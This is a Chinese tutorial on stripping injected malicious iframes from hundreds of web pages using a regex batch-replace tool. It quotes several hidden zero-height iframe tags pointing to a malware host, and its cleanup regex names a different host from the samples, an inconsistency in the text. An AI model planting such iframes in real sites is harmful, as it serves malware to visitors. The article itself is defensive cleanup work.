批量使用替换工具删除相关木马

安全 黑客攻防
网站被批量挂马是经常遇到的事情,一般用批量替换工具很方便就可以批量删除相关代码,但是如果一个网站里面每个页面都被放置了木马,而且代码还都不一样。这种情况如何处理?

网站被批量挂马是经常遇到的事情,一般用批量替换工具很方便就可以批量删除相关代码,但是如果一个网站里面每个页面都被放置了木马,而且代码还都不一样。这种情况如何处理?

下面我们一起来学习一下批量使用替换工具删除相关木马:

因为没有一个页面挂的马是相同的,所以根本删不掉。前几天我的一个朋友就遇到了这个问题。他诉苦道服务器上一个网站被批量挂了木马,仔细一看居然每个页面挂的木马都不一样。

我检查了一下是类似这样的情况:

页面一的木马是:

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>

页面二的木马是:

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>

页面三的木马是:

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>

……

仔细看,虽然每个页面上挂的木马不同,但是还是有一定规律的。

这时候,我就在郁闷了,要是能有一个支持正则的批量替换工具就好了。还好补天的areone帮忙,给我介绍了一个小工具,恰恰可以满足这个要求。

打开AFR工具,选择批量替换:

搜索内容部分填写:

<ifraME src=http://88lai.3322.org/u.asp widTH=50 height=0 name=\d{4} naMe=2 boRdeR=0></ifRame>

替换为空 即可。

注意上面语句中红色部分,就是正则表达式了。通过这种方法,就可以批量对木马进行删除了。

很快,清除了4百多个页面上的木马。大功告成。

正则表达式在平时技术方面的应用中用的很多,后面我也会给大家找一些这方面的教材。

责任编辑:蓝雨泪 来源: 黑客x档案
相关推荐

2011-08-04 15:07:24

2010-01-08 10:49:21

JSON 转换工具

2014-09-02 14:18:27

NodeJsLivePool

2014-12-04 10:07:03

工具

2009-03-25 17:10:50

Linux视频转换

2010-09-03 11:47:38

SQL删除

2009-09-25 11:34:54

Hibernate处理Hibernate批量

2010-09-01 16:26:11

SQL删除批量

2022-09-24 16:53:05

Python工具办公

2022-06-07 09:58:48

Spotify开源音频文件

2020-07-20 07:33:44

Python开发工具

2023-04-19 07:53:29

Node.jsNrm

2014-07-24 09:45:00

HTML视频视频转换

2010-05-14 12:04:02

2010-09-02 16:46:18

SQL删除

2009-09-11 08:47:03

Linux系统批量替换文件Linux

2010-11-26 10:29:21

MySQL批量替换

2010-09-03 11:35:50

2012-05-23 09:40:09

HTML5

2018-08-31 10:10:55

Linux开源转换工具
点赞
收藏

51CTO技术栈公众号